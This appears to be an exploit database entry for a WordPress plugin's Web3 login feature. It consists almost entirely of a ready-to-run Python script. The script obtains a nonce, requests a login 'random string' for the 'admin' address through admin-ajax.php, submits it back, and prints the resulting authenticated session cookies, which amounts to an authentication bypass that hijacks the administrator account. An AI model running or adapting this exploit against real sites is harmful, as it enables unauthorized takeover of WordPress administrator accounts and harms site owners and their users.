Share
## https://sploitus.com/exploit?id=WPEX-ID:7F30AB20-805B-422C-A9A5-21D39C570EE4
Run the following Python script:
```
import requests
import re
URL_BASE = "http://localhost:8083"
LOGIN_PATH="/wp-login.php"
USERNAME = "admin"
def get_login_page():
response = requests.get(f"{URL_BASE}/wp-login.php")
nonce = extract_nonce(response.text)
return response.cookies, nonce
def extract_nonce(html_content):
pattern = r'\"wp_nonce\":\"(.*?)\"'
match = re.search(pattern, html_content)
if match:
print("Website nonce:", match.group(1))
return match.group(1)
else:
raise ValueError("Nonce not found in the HTML content.")
def post_data(cookies, nonce):
headers = {
}
data = {
"action": "type_of_request",
"request": "login",
"address": USERNAME,
"mo_web3_verify_nonce": nonce
}
response = requests.post(f"{URL_BASE}/wp-admin/admin-ajax.php", headers=headers, data=data, cookies=cookies)
random_string = extract_random_string(response.text)
return random_string
def extract_random_string(response_content):
pattern = r'Random string: (\w+)'
match = re.search(pattern, response_content)
if match:
print("User nonce:", match.group(1))
return match.group(1)
else:
raise ValueError("Random string not found in the response content.")
def post_with_random_string(cookies, nonce, random_string):
headers = {
}
data = {
"address": USERNAME,
"nonce": random_string,
"mo_web3_hiddenform_nonce": nonce
}
response = requests.post(f"{URL_BASE}/wp-admin/admin-ajax.php", headers=headers, data=data, cookies=cookies, allow_redirects=False)
return response.cookies
def print_cookies(cookies_jar):
for cookie in cookies_jar:
print(f"{cookie.name}: {cookie.value}")
def main():
cookies, nonce = get_login_page()
random_string = post_data(cookies, nonce)
new_cookies = post_with_random_string(cookies, nonce, random_string)
print("----------------")
print("Cookies:")
print_cookies(new_cookies)
if __name__ == "__main__":
main()
```